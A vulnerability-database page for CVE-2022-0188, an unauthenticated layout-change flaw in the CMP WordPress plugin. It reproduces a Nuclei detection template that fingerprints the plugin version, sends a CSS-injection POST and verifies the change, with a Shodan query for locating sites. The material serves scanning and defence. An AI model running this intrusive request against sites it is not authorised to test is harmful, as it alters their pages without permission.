CVE-2022-0188: CMP WordPress < 4.0.19 - Broken Access Control

日期: 2026-01-24 | 影响软件: CMP WordPress | POC: 已公开

漏洞描述

CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2022-0188

info:
  name: CMP WordPress < 4.0.19 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication.
  reference:
    - https://wpscan.com/vulnerability/50b6f770-6f53-41ef-b2f3-2a58e9afd332/
  impact:
    Unauthenticated users can alter the coming soon page layout, potentially misleading visitors or causing defacement.
  remediation:
    Update to version 4.0.19 or later.
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"wp-content/plugins/cmp-coming-soon-maintenance"
  tags: cve,cve2022,wp-scan,wordpress,wp-plugin,cmp,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 4.0.19')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        niteoCS_footer_background_opacity_hardwork=0);body{background:url({{randstr}});}div{color:red

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_2, '{{randstr}}','cmp-coming-soon-maintenance')"
          - "contains_any(body_2, 'niteoCS','cmp-theme','coming-soon')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: injected-css
        part: body_2
        group: 1
        regex:
          - 'background:url\(([a-zA-Z0-9]+)\)'
# digest: 4a0a0047304502203505af93572a3093ccf440dd1645e78d00042cc9cef657f25d664841fa2ca4ac022100a819d7f367cdf8e4f312afe56f45f9593ce46b8a29d3068fa1abb7bf774127bc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0188.yaml

相关漏洞推荐